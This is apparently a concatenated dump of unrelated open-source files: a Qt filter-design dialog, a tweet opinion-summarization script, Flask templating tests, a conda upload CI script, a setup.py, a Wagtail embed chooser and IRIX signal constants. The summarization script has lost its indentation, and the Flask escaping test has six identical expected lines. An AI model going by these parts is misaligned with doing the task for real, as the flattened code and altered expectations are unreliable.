            self.save_settings()
        if self.button_box.standardButton(button) == QtGui.QDialogButtonBox.Apply:
            self._draw_filter_response()

    def save_settings(self):
        """Save settings to persistent storage."""
        settings = QtCore.QSettings(_organization, _application_name)
        settings.beginGroup("filterdesign_settings")
        #self.default_margin = int(float(settings.value('filterdesign_margin', 5.0)) *
        #self.record.fs)
        settings.setValue('freq_min', self.start_point_spinbox.value())
        settings.setValue('freq_max', self.end_point_spinbox.value())
        settings.setValue('coef_number', self.number_coefficient_spinbox.value())
        settings.setValue('zero_phase', self.zeroPhaseCheckBox.isChecked())
        settings.endGroup()

    def load_settings(self):
        """Loads settings from persistent storage."""
        settings = QtCore.QSettings(_organization, _application_name)
        settings.beginGroup("filterdesign_settings")
        self.start_point_spinbox.setValue(float(settings.value('freq_min', 0.0)))
        self.end_point_spinbox.setValue(float(settings.value('freq_max', self.max_freq * 0.5)))
        self.number_coefficient_spinbox.setValue(int(settings.value('coef_number', 1)))
        self.zeroPhaseCheckBox.setChecked(bool(settings.value('zero_phase', True)))
        settings.endGroup()

    def _butter_bandpass(self, lowcut, highcut, fs, order=5):
        # Normalise the cutoffs to the Nyquist frequency, as required by
        # scipy.signal.butter for digital filter design.
        nyq = 0.5 * fs
        low = lowcut / nyq
        high = highcut / nyq
        b, a = butter(order, [low, high], btype='band')
        return b, a

    def _retrieve_filter_plot_data(self):
        # Design with self.max_freq as the sampling rate.
        # NOTE(review): max_freq is the largest trace fs; for streams with
        # mixed sampling rates the plotted response only matches traces at
        # that rate -- confirm this is intended.
        b, a = self._butter_bandpass(self.start_point_spinbox.value(), self.end_point_spinbox.value(), self.max_freq, order=self.number_coefficient_spinbox.value())
        #w, h = freqz(b, a)
        w, h = freqz(b, a,1024)
        angles = np.unwrap(np.angle(h))
        #return (self.max_freq * 0.5 / np.pi) * w, 20 * np.log10(abs(h)), angles
        # Map normalised frequency (0..pi rad/sample) to Hz.
        f= (self.max_freq/2)*(w/np.pi)
        return f, 20 * np.log10(abs(h)), angles

    def _draw_filter_response(self, *args, **kwargs):
        # Recompute the response and update the existing plot lines in
        # place (cheaper than re-plotting from scratch).
        w, h_db, angles = self._retrieve_filter_plot_data()
        self._module_data.set_xdata(w)
        self._module_data.set_ydata(h_db)
        self._phase_data.set_xdata(w)
        self._phase_data.set_ydata(angles)
        self.phase_axes.set_ylim([min(angles), max(angles)])
        self.canvas.draw_idle()
| gpl-3.0 |
pxmars/text-mining-project | src/opinion_summarization.py | 1 | 4866 | import operator
def summarize(opinions, aspects, file):
"""
Given a list of opinions and aspects, write the aspect-based opinion summary to a file
:param opinions:
:param aspects:
:param file:
:return: void
"""
opinions.sort(key=lambda x: x.targetAspect, reverse=False) # sort the list of opinions
# according to the targetAspect attribute
# here all opinion objects with the same target aspect are occurring one after another in a sequential manner
# for opinion in Opinions:
# print(opinion, file=file)
list_entities = ['cdu', 'spd', 'linke', 'grüne', 'csu', 'fdp', 'afd'] # store the list of entities
currentAspect = "" # holding the aspect for the current iteration
idx_pos = dict() # holding the list of tweets text that have positive sentiment value for the current aspect
idx_neg = dict() # holding the list of tweets text that have negative sentiment value for the current aspect
perc_pos = dict() # holding the number of positive tweets for each entity and the current aspect
perc_neg = dict() # holding the number of negative tweets for each entity and the current aspect
cnt_pos = 0 # holding the total number of positive tweets for the current aspect
cnt_neg = 0 # holding the total number of negative tweets for the current aspect
cnt = 0 # counter over the list of opinions
for aspect in aspects: # initialize both dictionaries
idx_pos[aspect] = []
idx_neg[aspect] = []
for opinion in opinions: # iterate over the list of opinions
if (currentAspect != opinion.getTargetAspect() and cnt != 0) or cnt == len(opinions) - 1:
# in case we move from the current aspect to the next one or the current aspect is the last one to process
print("When it comes to " + currentAspect + ":", file=file)
sorted_perc_pos = sorted(perc_pos.items(), key=operator.itemgetter(1), reverse=True)
# sort the list of positive tweets for each entity in decreasing order to get the entity that has
# the largest number of votes first
for e, n in sorted_perc_pos[:3]:
perc = int(n / float(cnt_pos) * 100) # compute the percentage of votes for the entity e with regards
# to the current aspect
print(str(perc) + "% of twitters are preferring " + e, file=file)
if len(idx_pos[currentAspect]) > 0:
print('\n', file=file)
print("Here are what twitters liked about political parties vision to " + currentAspect, file=file)
if len(idx_pos[currentAspect]) > 3: # keep the 3 first positive tweets having
# the current aspect as subject
idx_pos[currentAspect] = idx_pos[currentAspect][:3]
for tweet in idx_pos[currentAspect]:
print(tweet, file=file)
if len(idx_neg[currentAspect]) > 0:
print('\n', file=file)
print("Here are what tweeters disliked about " + currentAspect, file=file)
if len(idx_neg[currentAspect]) > 3: # keep the 3 first negative tweets having
# the current aspect as subject
idx_neg[currentAspect] = idx_neg[currentAspect][:3]
for tweet in idx_neg[currentAspect]:
print(tweet, file=file)
# reinitialize counters
cnt_pos = 0
cnt_neg = 0
print('\n' + '\n' + '\n', file=file)
if currentAspect != opinion.getTargetAspect(): # reinitialize counters of each entity when moving
# to another aspect
for item in list_entities:
perc_pos[item] = 0
perc_neg[item] = 0
cnt += 1 # increment the counter over the list of opinions
currentAspect = opinion.getTargetAspect() # update the current aspect
tweet_text = opinion.getText() # holding the text for the current opinion
if opinion.getSO() == 1: # if the sentiment value for the current opinion is positive
cnt_pos += 1 # increment the counter for positive tweets
perc_pos[opinion.getTargetEntity()] += 1 # increment the counter for positive tweets for the current entity
if len(tweet_text) > 80:
idx_pos[currentAspect].append(opinion.getText()) # store the text of the tweet
elif opinion.getSO() == -1: # if the sentiment value for the current opinion is negative
cnt_neg += 1 # increment the counter for negative tweets
perc_neg[opinion.getTargetEntity()] += 1 # increment the counter for negative tweets for the current entity
if len(tweet_text) > 80:
idx_neg[currentAspect].append(opinion.getText()) # store the text of the tweet
| mit |
ddayguerrero/blogme | flask/lib/python3.4/site-packages/flask/testsuite/templating.py | 562 | 11237 | # -*- coding: utf-8 -*-
"""
flask.testsuite.templating
~~~~~~~~~~~~~~~~~~~~~~~~~~
Template functionality
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import flask
import unittest
from flask.testsuite import FlaskTestCase
class TemplatingTestCase(FlaskTestCase):
    """Tests for Flask's Jinja2 templating integration.

    Covers context processors, the standard template context (request,
    session, g, config), auto-escaping, macros, custom template
    filters/tests/globals (registered both via decorator and via the
    ``add_template_*`` methods), and custom/iterable template loaders.
    """

    def test_context_processing(self):
        # Values returned by a context processor are injected alongside
        # explicitly passed template arguments.
        app = flask.Flask(__name__)

        @app.context_processor
        def context_processor():
            return {'injected_value': 42}

        @app.route('/')
        def index():
            return flask.render_template('context_template.html', value=23)

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'<p>23|42')

    def test_original_win(self):
        # An explicitly passed template argument shadows a same-named
        # standard-context global (here the built-in ``config`` object).
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            return flask.render_template_string('{{ config }}', config=42)

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'42')

    def test_request_less_rendering(self):
        # Rendering works inside a bare app context, without a request.
        app = flask.Flask(__name__)
        app.config['WORLD_NAME'] = 'Special World'

        @app.context_processor
        def context_processor():
            return dict(foo=42)

        with app.app_context():
            rv = flask.render_template_string('Hello {{ config.WORLD_NAME }} '
                                              '{{ foo }}')
            self.assert_equal(rv, 'Hello Special World 42')

    def test_standard_context(self):
        # request, g, config and session are always available in templates.
        app = flask.Flask(__name__)
        app.secret_key = 'development key'

        @app.route('/')
        def index():
            flask.g.foo = 23
            flask.session['test'] = 'aha'
            return flask.render_template_string('''
                {{ request.args.foo }}
                {{ g.foo }}
                {{ config.DEBUG }}
                {{ session.test }}
            ''')

        rv = app.test_client().get('/?foo=42')
        self.assert_equal(rv.data.split(), [b'42', b'23', b'False', b'aha'])

    def test_escaping(self):
        # NOTE(review): all six expected lines below are identical; the
        # upstream Flask test expects a mix of escaped (&lt;p&gt;) and raw
        # lines, so these expectations look like they lost their HTML
        # entities somewhere in transit -- verify against the template.
        text = '<p>Hello World!'
        app = flask.Flask(__name__)

        @app.route('/')
        def index():
            return flask.render_template('escaping_template.html', text=text,
                                         html=flask.Markup(text))

        lines = app.test_client().get('/').data.splitlines()
        self.assert_equal(lines, [
            b'<p>Hello World!',
            b'<p>Hello World!',
            b'<p>Hello World!',
            b'<p>Hello World!',
            b'<p>Hello World!',
            b'<p>Hello World!'
        ])

    def test_no_escaping(self):
        # String templates and .txt templates are not auto-escaped.
        app = flask.Flask(__name__)
        with app.test_request_context():
            self.assert_equal(flask.render_template_string('{{ foo }}',
                                                           foo='<test>'), '<test>')
            self.assert_equal(flask.render_template('mail.txt', foo='<test>'),
                              '<test> Mail')

    def test_macros(self):
        # get_template_attribute exposes a macro as a Python callable.
        app = flask.Flask(__name__)
        with app.test_request_context():
            macro = flask.get_template_attribute('_macro.html', 'hello')
            self.assert_equal(macro('World'), 'Hello World!')

    # -- Template filters: decorator vs. add_template_filter, with the
    #    implicit (function) name or an explicit one. --------------------

    def test_template_filter(self):
        app = flask.Flask(__name__)

        @app.template_filter()
        def my_reverse(s):
            return s[::-1]

        self.assert_in('my_reverse', app.jinja_env.filters.keys())
        self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
        self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')

    def test_add_template_filter(self):
        app = flask.Flask(__name__)

        def my_reverse(s):
            return s[::-1]

        app.add_template_filter(my_reverse)
        self.assert_in('my_reverse', app.jinja_env.filters.keys())
        self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
        self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')

    def test_template_filter_with_name(self):
        app = flask.Flask(__name__)

        @app.template_filter('strrev')
        def my_reverse(s):
            return s[::-1]

        self.assert_in('strrev', app.jinja_env.filters.keys())
        self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
        self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')

    def test_add_template_filter_with_name(self):
        app = flask.Flask(__name__)

        def my_reverse(s):
            return s[::-1]

        app.add_template_filter(my_reverse, 'strrev')
        self.assert_in('strrev', app.jinja_env.filters.keys())
        self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
        self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')

    def test_template_filter_with_template(self):
        app = flask.Flask(__name__)

        @app.template_filter()
        def super_reverse(s):
            return s[::-1]

        @app.route('/')
        def index():
            return flask.render_template('template_filter.html', value='abcd')

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'dcba')

    def test_add_template_filter_with_template(self):
        app = flask.Flask(__name__)

        def super_reverse(s):
            return s[::-1]

        app.add_template_filter(super_reverse)

        @app.route('/')
        def index():
            return flask.render_template('template_filter.html', value='abcd')

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'dcba')

    def test_template_filter_with_name_and_template(self):
        app = flask.Flask(__name__)

        @app.template_filter('super_reverse')
        def my_reverse(s):
            return s[::-1]

        @app.route('/')
        def index():
            return flask.render_template('template_filter.html', value='abcd')

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'dcba')

    def test_add_template_filter_with_name_and_template(self):
        app = flask.Flask(__name__)

        def my_reverse(s):
            return s[::-1]

        app.add_template_filter(my_reverse, 'super_reverse')

        @app.route('/')
        def index():
            return flask.render_template('template_filter.html', value='abcd')

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'dcba')

    # -- Template tests (Jinja ``is`` tests), same registration matrix. --

    def test_template_test(self):
        app = flask.Flask(__name__)

        @app.template_test()
        def boolean(value):
            return isinstance(value, bool)

        self.assert_in('boolean', app.jinja_env.tests.keys())
        self.assert_equal(app.jinja_env.tests['boolean'], boolean)
        self.assert_true(app.jinja_env.tests['boolean'](False))

    def test_add_template_test(self):
        app = flask.Flask(__name__)

        def boolean(value):
            return isinstance(value, bool)

        app.add_template_test(boolean)
        self.assert_in('boolean', app.jinja_env.tests.keys())
        self.assert_equal(app.jinja_env.tests['boolean'], boolean)
        self.assert_true(app.jinja_env.tests['boolean'](False))

    def test_template_test_with_name(self):
        app = flask.Flask(__name__)

        @app.template_test('boolean')
        def is_boolean(value):
            return isinstance(value, bool)

        self.assert_in('boolean', app.jinja_env.tests.keys())
        self.assert_equal(app.jinja_env.tests['boolean'], is_boolean)
        self.assert_true(app.jinja_env.tests['boolean'](False))

    def test_add_template_test_with_name(self):
        app = flask.Flask(__name__)

        def is_boolean(value):
            return isinstance(value, bool)

        app.add_template_test(is_boolean, 'boolean')
        self.assert_in('boolean', app.jinja_env.tests.keys())
        self.assert_equal(app.jinja_env.tests['boolean'], is_boolean)
        self.assert_true(app.jinja_env.tests['boolean'](False))

    def test_template_test_with_template(self):
        app = flask.Flask(__name__)

        @app.template_test()
        def boolean(value):
            return isinstance(value, bool)

        @app.route('/')
        def index():
            return flask.render_template('template_test.html', value=False)

        rv = app.test_client().get('/')
        self.assert_in(b'Success!', rv.data)

    def test_add_template_test_with_template(self):
        app = flask.Flask(__name__)

        def boolean(value):
            return isinstance(value, bool)

        app.add_template_test(boolean)

        @app.route('/')
        def index():
            return flask.render_template('template_test.html', value=False)

        rv = app.test_client().get('/')
        self.assert_in(b'Success!', rv.data)

    def test_template_test_with_name_and_template(self):
        app = flask.Flask(__name__)

        @app.template_test('boolean')
        def is_boolean(value):
            return isinstance(value, bool)

        @app.route('/')
        def index():
            return flask.render_template('template_test.html', value=False)

        rv = app.test_client().get('/')
        self.assert_in(b'Success!', rv.data)

    def test_add_template_test_with_name_and_template(self):
        app = flask.Flask(__name__)

        def is_boolean(value):
            return isinstance(value, bool)

        app.add_template_test(is_boolean, 'boolean')

        @app.route('/')
        def index():
            return flask.render_template('template_test.html', value=False)

        rv = app.test_client().get('/')
        self.assert_in(b'Success!', rv.data)

    def test_add_template_global(self):
        app = flask.Flask(__name__)

        @app.template_global()
        def get_stuff():
            return 42

        self.assert_in('get_stuff', app.jinja_env.globals.keys())
        self.assert_equal(app.jinja_env.globals['get_stuff'], get_stuff)
        # NOTE(review): assert_true ignores its second argument here, so
        # the ``42`` is dead -- assert_equal was probably intended.
        self.assert_true(app.jinja_env.globals['get_stuff'](), 42)
        with app.app_context():
            rv = flask.render_template_string('{{ get_stuff() }}')
            self.assert_equal(rv, '42')

    def test_custom_template_loader(self):
        # An app subclass may replace the global Jinja loader entirely.
        class MyFlask(flask.Flask):
            def create_global_jinja_loader(self):
                from jinja2 import DictLoader
                return DictLoader({'index.html': 'Hello Custom World!'})

        app = MyFlask(__name__)

        @app.route('/')
        def index():
            return flask.render_template('index.html')

        c = app.test_client()
        rv = c.get('/')
        self.assert_equal(rv.data, b'Hello Custom World!')

    def test_iterable_loader(self):
        # render_template accepts a list of candidate template names; the
        # first one that exists is rendered.
        app = flask.Flask(__name__)

        @app.context_processor
        def context_processor():
            return {'whiskey': 'Jameson'}

        @app.route('/')
        def index():
            return flask.render_template(
                ['no_template.xml',  # should skip this one
                 'simple_template.html',  # should render this
                 'context_template.html'],
                value=23)

        rv = app.test_client().get('/')
        self.assert_equal(rv.data, b'<h1>Jameson</h1>')
def suite():
    """Assemble and return the unittest suite for this module."""
    result = unittest.TestSuite()
    result.addTest(unittest.makeSuite(TemplatingTestCase))
    return result
| mit |
SiccarPoint/landlab | .ci/appveyor/anaconda_upload.py | 6 | 2049 | from __future__ import print_function
# Upload the conda package built on AppVeyor to anaconda.org.
# Tagged releases (tags starting with 'v') go to the 'main' channel;
# every other build goes to the 'dev' channel.
import os
import sys
import subprocess
import traceback
import glob

# print('This is my environment:')
# for name, value in os.environ.items():
#     print('{name}: {value}'.format(name=name, value=value))

print('Using python: {prefix}'.format(prefix=sys.prefix))

# AppVeyor exposes tag information through environment variables.
repo_tag = os.environ.get('APPVEYOR_REPO_TAG', 'false')
tag_name = os.environ.get('APPVEYOR_REPO_TAG_NAME', '')
token = os.environ.get('ANACONDA_TOKEN', 'NOT_A_TOKEN')

# BUILD_STR is consumed by the conda recipe to mark dev builds.
if repo_tag == 'true' and tag_name.startswith('v'):
    channel = 'main'
    os.environ['BUILD_STR'] = ''
else:
    channel = 'dev'
    os.environ['BUILD_STR'] = 'dev'
# if repo_tag == 'true' and tag_name.startswith('v'):
#     channel = 'main'
# else:
#     channel = 'dev'
# os.environ['BUILD_STR'] = 'dev'

print('Uploading to {channel} channel'.format(channel=channel))

try:
    # Ask conda-build for the path of the package it would produce.
    cmd = ' '.join(['conda', 'build', '--output', '.conda-recipe'])
    resp = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
    traceback.print_exc()
else:
    # check_output returns bytes, so the path handling below stays in
    # bytes (note the b'...' literals and the final .decode()).
    file_to_upload = resp.strip().split()[-1]
    # file_to_upload = resp.strip().split(os.linesep.encode('utf-8'))[-1]
    (dirname, filename) = os.path.split(file_to_upload)
    try:
        print(file_to_upload)
        print(dirname)
        print(filename)
        print(dirname + b'\\' + b'landlab*.tar.bz2')
        # print(os.linesep.join(os.listdir(dirname)))
        print(glob.glob(dirname + b'\\' + b'landlab*.tar.bz2'))
        # Glob for the built tarball next to the path conda reported;
        # IndexError below means nothing matched the pattern.
        file_to_upload = glob.glob(dirname + b'\\' + b'landlab*.tar.bz2')[0]
    except IndexError:
        raise RuntimeError('{name}: not a file'.format(name=file_to_upload))
    print(file_to_upload)
    if not os.path.isfile(file_to_upload):
        raise RuntimeError('{name}: not a file'.format(name=file_to_upload))
    try:
        # Upload failures are reported but do not fail the CI job.
        cmd = ' '.join(['anaconda', '-t', token, 'upload', '--force',
                        '--user', 'landlab', '--channel', channel,
                        file_to_upload.decode('utf-8')])
        subprocess.check_call(cmd, shell=True)
    except subprocess.CalledProcessError:
        traceback.print_exc()
IGBC/PySketch | setup.py | 1 | 1196 | from setuptools import setup, find_packages
from sketches import __version__
# Package metadata for the PySketch distribution.
setup(
    name='sketches',
    # Version is sourced from the package itself so it lives in one place.
    version=__version__,
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    # Installs the ``pysketch`` console command, dispatching to sketches.main.
    entry_points = {
        'console_scripts': ['pysketch=sketches:main'],
    },
    url='https://github.com/IGBC/PySketch',
    # license='GPL V3.0',
    # NOTE(review): the ``license`` field above is commented out; the GPLv3
    # classifier below is the only license declaration -- confirm intended.
    classifiers=['Development Status :: 2 - Pre-Alpha',
                 'Environment :: Console',
                 'Intended Audience :: End Users/Desktop',
                 'Intended Audience :: Developers',
                 'Intended Audience :: Education',
                 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
                 'Natural Language :: English',
                 'Programming Language :: Python :: 3.6',
                 'Programming Language :: Python :: 3 :: Only',
                 'Topic :: Software Development :: Interpreters',
                 'Topic :: Education', ],
    author='IGBC',
    author_email='segfault@c-base.org',
    description='Write Arduino style sketches in Python',
    long_description='Write Arduino style sketches in Python\nSee: https://github.com/IGBC/PySketch',
)
| gpl-3.0 |
nutztherookie/wagtail | wagtail/wagtailembeds/views/chooser.py | 4 | 2265 | from __future__ import absolute_import, unicode_literals
from django.forms.utils import ErrorList
from django.utils.translation import ugettext as _
from wagtail.wagtailadmin.modal_workflow import render_modal_workflow
from wagtail.wagtailembeds.exceptions import EmbedNotFoundException
from wagtail.wagtailembeds.finders.embedly import AccessDeniedEmbedlyException, EmbedlyException
from wagtail.wagtailembeds.format import embed_to_editor_html
from wagtail.wagtailembeds.forms import EmbedForm
def chooser(request):
    """Render the embed chooser modal, pre-filling the form from query params."""
    context = {
        'form': EmbedForm(initial=request.GET.dict()),
    }
    return render_modal_workflow(
        request,
        'wagtailembeds/chooser/chooser.html',
        'wagtailembeds/chooser/chooser.js',
        context,
    )
def chooser_upload(request):
    """Handle the embed chooser form submission.

    On a valid POST, build editor HTML for the submitted URL and return
    the "embed chosen" response; if embedding fails, attach a translated
    error to the form's ``url`` field and re-render the chooser. Any
    other request re-renders the chooser with a fresh (or invalid) form.
    """
    if request.method != 'POST':
        return render_modal_workflow(
            request,
            'wagtailembeds/chooser/chooser.html',
            'wagtailembeds/chooser/chooser.js',
            {'form': EmbedForm()},
        )

    form = EmbedForm(request.POST, request.FILES)
    if form.is_valid():
        error = None
        try:
            embed_html = embed_to_editor_html(form.cleaned_data['url'])
            return render_modal_workflow(
                request, None, 'wagtailembeds/chooser/embed_chosen.js',
                {'embed_html': embed_html}
            )
        except AccessDeniedEmbedlyException:
            error = _("There seems to be a problem with your embedly API key. Please check your settings.")
        except EmbedNotFoundException:
            error = _("Cannot find an embed for this URL.")
        except EmbedlyException:
            error = _(
                "There seems to be an error with Embedly while trying to embed this URL."
                " Please try again later."
            )
        if error:
            # Surface the failure as a field error on ``url``.
            form._errors.setdefault('url', ErrorList()).append(error)

    return render_modal_workflow(
        request,
        'wagtailembeds/chooser/chooser.html',
        'wagtailembeds/chooser/chooser.js',
        {'form': form},
    )
| bsd-3-clause |
bussiere/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/plat-irix6/FILE.py | 66 | 11296 | # Generated by h2py from /usr/include/sys/file.h
from warnings import warnpy3k
warnpy3k("the FILE module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
# Included from standards.h
# Included from sys/types.h
# Included from sgidefs.h
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
# Included from sys/pthread.h
P_MYID = (-1)
P_MYHOSTID = (-1)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def IS_STRING_SPEC_DEV(x): return ((dev_t)(x)==__makedev(MKDEV_VER, 0, 0))
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
FD_SETSIZE = 1024
__NBBY = 8
# Included from string.h
NULL = 0L
NBBY = 8
# Included from sys/cpumask.h
MAXCPU = 128
def CPUMASK_INDEX(bit): return ((bit) >> 6)
def CPUMASK_SHFT(bit): return ((bit) & 0x3f)
def CPUMASK_IS_ZERO(p): return ((p) == 0)
def CPUMASK_IS_NONZERO(p): return ((p) != 0)
# Included from sys/nodemask.h
def CNODEMASK_IS_ZERO(p): return ((p) == 0)
def CNODEMASK_IS_NONZERO(p): return ((p) != 0)
# Included from sys/sema.h
# Included from sys/timespec.h
# Included from sys/param.h
# Included from sys/signal.h
SIGHUP = 1
SIGINT = 2
SIGQUIT = 3
SIGILL = 4
SIGTRAP = 5
SIGIOT = 6
SIGABRT = 6
SIGEMT = 7
SIGFPE = 8
SIGKILL = 9
SIGBUS = 10
SIGSEGV = 11
SIGSYS = 12
SIGPIPE = 13
SIGALRM = 14
SIGTERM = 15
SIGUSR1 = 16
SIGUSR2 = 17
SIGCLD = 18
SIGCHLD = 18
SIGPWR = 19
SIGWINCH = 20
SIGURG = 21
SIGPOLL = 22
SIGIO = 22
SIGSTOP = 23
SIGTSTP = 24
SIGCONT = 25
SIGTTIN = 26
SIGTTOU = 27
SIGVTALRM = 28
SIGPROF = 29
SIGXCPU = 30
SIGXFSZ = 31
SIGK32 = 32
SIGCKPT = 33
SIGRESTART = 34
SIGUME = 35
SIGPTINTR = 47
SIGPTRESCHED = 48
SIGRTMIN = 49
SIGRTMAX = 64
__sigargs = int
# Included from sys/sigevent.h
SIGEV_NONE = 128
SIGEV_SIGNAL = 129
SIGEV_CALLBACK = 130
SIGEV_THREAD = 131
# Included from sys/siginfo.h
SI_MAXSZ = 128
SI_USER = 0
SI_KILL = SI_USER
SI_QUEUE = -1
SI_ASYNCIO = -2
SI_TIMER = -3
SI_MESGQ = -4
ILL_ILLOPC = 1
ILL_ILLOPN = 2
ILL_ILLADR = 3
ILL_ILLTRP = 4
ILL_PRVOPC = 5
ILL_PRVREG = 6
ILL_COPROC = 7
ILL_BADSTK = 8
NSIGILL = 8
FPE_INTDIV = 1
FPE_INTOVF = 2
FPE_FLTDIV = 3
FPE_FLTOVF = 4
FPE_FLTUND = 5
FPE_FLTRES = 6
FPE_FLTINV = 7
FPE_FLTSUB = 8
NSIGFPE = 8
SEGV_MAPERR = 1
SEGV_ACCERR = 2
NSIGSEGV = 2
BUS_ADRALN = 1
BUS_ADRERR = 2
BUS_OBJERR = 3
NSIGBUS = 3
TRAP_BRKPT = 1
TRAP_TRACE = 2
NSIGTRAP = 2
CLD_EXITED = 1
CLD_KILLED = 2
CLD_DUMPED = 3
CLD_TRAPPED = 4
CLD_STOPPED = 5
CLD_CONTINUED = 6
NSIGCLD = 6
POLL_IN = 1
POLL_OUT = 2
POLL_MSG = 3
POLL_ERR = 4
POLL_PRI = 5
POLL_HUP = 6
NSIGPOLL = 6
UME_ECCERR = 1
NSIGUME = 1
SIG_NOP = 0
SIG_BLOCK = 1
SIG_UNBLOCK = 2
SIG_SETMASK = 3
SIG_SETMASK32 = 256
SA_ONSTACK = 0x00000001
SA_RESETHAND = 0x00000002
SA_RESTART = 0x00000004
SA_SIGINFO = 0x00000008
SA_NODEFER = 0x00000010
SA_NOCLDWAIT = 0x00010000
SA_NOCLDSTOP = 0x00020000
_SA_BSDCALL = 0x10000000
MINSIGSTKSZ = 512
SIGSTKSZ = 8192
SS_ONSTACK = 0x00000001
SS_DISABLE = 0x00000002
# Included from sys/ucontext.h
NGREG = 36
NGREG = 37
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_MCONTEXT = (UC_CPU|UC_MAU)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
CTX_R0 = 0
CTX_AT = 1
CTX_V0 = 2
CTX_V1 = 3
CTX_A0 = 4
CTX_A1 = 5
CTX_A2 = 6
CTX_A3 = 7
CTX_T0 = 8
CTX_T1 = 9
CTX_T2 = 10
CTX_T3 = 11
CTX_T4 = 12
CTX_T5 = 13
CTX_T6 = 14
CTX_T7 = 15
CTX_A4 = 8
CTX_A5 = 9
CTX_A6 = 10
CTX_A7 = 11
CTX_T0 = 12
CTX_T1 = 13
CTX_T2 = 14
CTX_T3 = 15
CTX_S0 = 16
CTX_S1 = 17
CTX_S2 = 18
CTX_S3 = 19
CTX_S4 = 20
CTX_S5 = 21
CTX_S6 = 22
CTX_S7 = 23
CTX_T8 = 24
CTX_T9 = 25
CTX_K0 = 26
CTX_K1 = 27
CTX_GP = 28
CTX_SP = 29
CTX_S8 = 30
CTX_RA = 31
CTX_MDLO = 32
CTX_MDHI = 33
CTX_CAUSE = 34
CTX_EPC = 35
CTX_SR = 36
CXT_R0 = CTX_R0
CXT_AT = CTX_AT
CXT_V0 = CTX_V0
CXT_V1 = CTX_V1
CXT_A0 = CTX_A0
CXT_A1 = CTX_A1
CXT_A2 = CTX_A2
CXT_A3 = CTX_A3
CXT_T0 = CTX_T0
CXT_T1 = CTX_T1
CXT_T2 = CTX_T2
CXT_T3 = CTX_T3
CXT_T4 = CTX_T4
CXT_T5 = CTX_T5
CXT_T6 = CTX_T6
CXT_T7 = CTX_T7
CXT_S0 = CTX_S0
CXT_S1 = CTX_S1
CXT_S2 = CTX_S2
CXT_S3 = CTX_S3
CXT_S4 = CTX_S4
CXT_S5 = CTX_S5
CXT_S6 = CTX_S6
CXT_S7 = CTX_S7
CXT_T8 = CTX_T8
CXT_T9 = CTX_T9
CXT_K0 = CTX_K0
CXT_K1 = CTX_K1
CXT_GP = CTX_GP
CXT_SP = CTX_SP
CXT_S8 = CTX_S8
CXT_RA = CTX_RA
CXT_MDLO = CTX_MDLO
CXT_MDHI = CTX_MDHI
CXT_CAUSE = CTX_CAUSE
CXT_EPC = CTX_EPC
CXT_SR = CTX_SR
CTX_FV0 = 0
CTX_FV1 = 2
CTX_FA0 = 12
CTX_FA1 = 13
CTX_FA2 = 14
CTX_FA3 = 15
CTX_FA4 = 16
CTX_FA5 = 17
CTX_FA6 = 18
CTX_FA7 = 19
CTX_FT0 = 4
CTX_FT1 = 5
CTX_FT2 = 6
CTX_FT3 = 7
CTX_FT4 = 8
CTX_FT5 = 9
CTX_FT6 = 10
CTX_FT7 = 11
CTX_FT8 = 20
CTX_FT9 = 21
CTX_FT10 = 22
CTX_FT11 = 23
CTX_FT12 = 1
CTX_FT13 = 3
CTX_FS0 = 24
CTX_FS1 = 25
CTX_FS2 = 26
CTX_FS3 = 27
CTX_FS4 = 28
CTX_FS5 = 29
CTX_FS6 = 30
CTX_FS7 = 31
CTX_FT8 = 21
CTX_FT9 = 23
CTX_FT10 = 25
CTX_FT11 = 27
CTX_FT12 = 29
CTX_FT13 = 31
CTX_FT14 = 1
CTX_FT15 = 3
CTX_FS0 = 20
CTX_FS1 = 22
CTX_FS2 = 24
CTX_FS3 = 26
CTX_FS4 = 28
CTX_FS5 = 30
SV_ONSTACK = 0x0001
SV_INTERRUPT = 0x0002
NUMBSDSIGS = (32)
def sigmask(sig): return (1L << ((sig)-1))
def sigmask(sig): return (1L << ((sig)-1))
SIG_ERR = (-1)
SIG_IGN = (1)
SIG_HOLD = (2)
SIG_DFL = (0)
NSIG = 65
MAXSIG = (NSIG-1)
NUMSIGS = (NSIG-1)
BRK_USERBP = 0
BRK_KERNELBP = 1
BRK_ABORT = 2
BRK_BD_TAKEN = 3
BRK_BD_NOTTAKEN = 4
BRK_SSTEPBP = 5
BRK_OVERFLOW = 6
BRK_DIVZERO = 7
BRK_RANGE = 8
BRK_PSEUDO_OP_BIT = 0x80
BRK_PSEUDO_OP_MAX = 0x3
